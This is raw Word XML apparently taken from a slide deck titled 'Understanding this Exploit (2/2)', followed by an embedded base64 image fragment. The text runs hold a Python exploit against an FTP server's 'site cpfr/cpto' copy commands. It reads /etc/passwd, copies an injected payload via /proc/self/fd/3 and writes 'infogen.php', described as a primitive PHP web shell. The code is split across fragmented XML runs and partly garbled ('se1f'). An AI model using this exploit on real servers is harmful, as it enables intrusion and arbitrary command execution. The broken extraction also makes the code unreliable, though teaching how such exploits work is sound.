    <w:p w14:paraId="08E20CA6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="275" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Notice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BE4B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="38" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1006" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Defining variables based off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A513078" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="7" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1126" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>command-line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD4115" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="25" w:after="1"/>
        <w:ind w:left="1096" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>Using PHP syntax to create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276CC80" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="27" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1606" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a primitive web shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290065F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="61" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Understanding this Exploit (2/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A512302" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="295"/>
        <w:ind w:left="7596" w:right="-1230"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD14E24" wp14:editId="6AAF851B">
            <wp:extent cx="6162675" cy="28575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340754" name="Picture 3407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54" name="Picture 340754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7589" w:tblpY="-196"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9759" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="53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941"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="33080A18" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="7200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9759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55B8DBEB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>s. connect((server, 21))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FD99832" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="1613" w:right="1292" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">s. recv(1024) print </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>+ ] Connected to server [ + ] \n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B07720" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. send( ' site cpfr /etc/passwd' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D6F2F9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. recv(1024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3406F5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>s. send( ' site cpto ' + evil)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFBD04D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. recv(1024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5372F802" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>s. send( ' site cpfr /proc/se1f/fd/3' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA13CFD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. recv(1024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50ADB510" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="-113" w:right="-178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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A924854" wp14:editId="08EDB176">
                      <wp:extent cx="6381750" cy="2695575"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="333935" name="Group 3339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81750" cy="2695575"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="6381750" cy="26955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40758" name="Picture 340758"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId7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8100"/>
                                  <a:ext cx="6381750" cy="2657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1716" name="Rectangle 91716"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1104900" y="19050"/>
                                  <a:ext cx="278702" cy="24069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CD97AFC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="48"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">s.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1717" name="Rectangle 91717"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1314450" y="19050"/>
                                  <a:ext cx="722090" cy="24069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81BC31E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">send(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1718" name="Rectangle 91718"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1857375" y="19050"/>
                                  <a:ext cx="114014" cy="24069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B0D3112" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="66"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">'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1719" name="Rectangle 91719"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1943100" y="19050"/>
                                  <a:ext cx="519398" cy="19002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6E59D0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="46"/>
                                      </w:rPr>
                                      <w:t>site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1742" name="Rectangle 91742"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="3181350" y="0"/>
                                  <a:ext cx="281840" cy="26603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B0040CD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="40"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">+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1743" name="Rectangle 91743"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="3400425" y="0"/>
                                  <a:ext cx="1380839" cy="27870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073421F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">directory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1744" name="Rectangle 91744"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4438650" y="0"/>
                                  <a:ext cx="281841" cy="26603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5DB5605" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="40"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">+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1745" name="Rectangle 91745"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4686300" y="0"/>
                                  <a:ext cx="1862233" cy="26603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4506769" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="40"/>
                                      </w:rPr>
                                      <w:t>'infogen.php')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924854" id="Group 333935" o:spid="_x0000_s1033" style="width:502.5pt;height:212.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="63817,269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WAAK3QMAAIoTAAAOAAAAZHJzL2Uyb0RvYy54bWzkWNtu4zYQfS/Q&#10;fxD0vpEo6o44i6LpBgsU3aDbfgBNU5ZQSSRIOnb69R1eJG8cu+vNg3cBP0QhKXE4PGfODM3b97uh&#10;D56YVB0fFyG6icOAjZSvunG9CP/+68O7MgyUJuOK9Hxki/CZqfD93c8/3W5FzRLe8n7FZABGRlVv&#10;xSJstRZ1FCnasoGoGy7YCC8bLgeioSvX0UqSLVgf+iiJ4zzacrkSklOmFIzeu5fhnbXfNIzqT02j&#10;mA76RQi+afuU9rk0z+jultRrSUTbUe8GeYMXA+lGWHQ2dU80CTaye2Vq6Kjkijf6hvIh4k3TUWb3&#10;ALtB8cFuHiTfCLuXdb1dixkmgPYApzebpX88PcqgWy1CjHGFszAYyQA82aUDPwYgbcW6hm8fpPgs&#10;HqUfWLue2feukYP5DzsKdhbe5xlettMBhcEcl6jIgAUK75K8yrIicwTQFlh6NY+2v31lZjQtHBn/&#10;ZndER2v483hB6xVeX48rmKU3koXeyHCWjYHIfzbiHVAriO6WXd/pZxumQKJxanx67OijdJ0voE/j&#10;IgOhOOjhE7NygN0oYG2mmq/NXOhGpv/C1LLvxIeu7w0Dpu2dhjg/iJMj+3YxeM/pZmCjdqKSrAf/&#10;+ajaTqgwkDUblgxiRH5cIceY0pJp2poFG1j4TxCa8YzU8wvr5d4x47OC0DkZLBAcsdfjiYDJitQF&#10;zEw7qYVU+oHxITANcBD8AKxJTZ5+V96j6RMPnHPCegc+mciGzKMmyKD3CrRvEtfnlggGLhize4Yr&#10;VKB8ItiARcZ1zwI3bNVkv561pU5hhVCcVoBTABJCVQxqgtmknhBLirKIE6+wNM6rwrx/K16k7kdj&#10;feQmuJwhMwJqmxw0Lb1b7lwKMYuZkSVfPUNaabn89xMUh6bn20XIfSs09QK4Mm/DoP84AuImNU8N&#10;OTWWU0Pq/lduE7jz5peN5k1n6d2v5t0CKi/IaXGcU4u6cQ0i4AxOMUpTkxePc1okSVxNWfPinKZX&#10;x+mciF/qtJyAOI/TMiswZKsTnCKUxij9Xjq1VXevnCvQaXVcp9W3cVql2NSoE5xmqMIVBI853UBq&#10;jhMrnUvl3nzayrXk3hTKnDswvdApDPsidJZOMSoR9rn3sJaWqEynvJvnMcbG8qX4nEvI1fCJj/Np&#10;UT+7lsKhOU4Tl3cP+ES4jEsMmcD+/HAHpQsSOtePqyEU6tsxgc4nirMEmqa4zP9HoMjzeXGBzrXj&#10;avicLwdeJtz5NHEen3mZY19EDwVa5kkCWdbfD1w64yLrzo9wLLK3GXDhY6uNv5wyN0pf9u3Pnf0V&#10;2t1/AAAA//8DAFBLAwQKAAAAAAAAACEAP2S/cW24AABtuAAAFAAAAGRycy9tZWRpYS9pbWFnZTEu&#10;anBn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoM&#10;DAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAEXAp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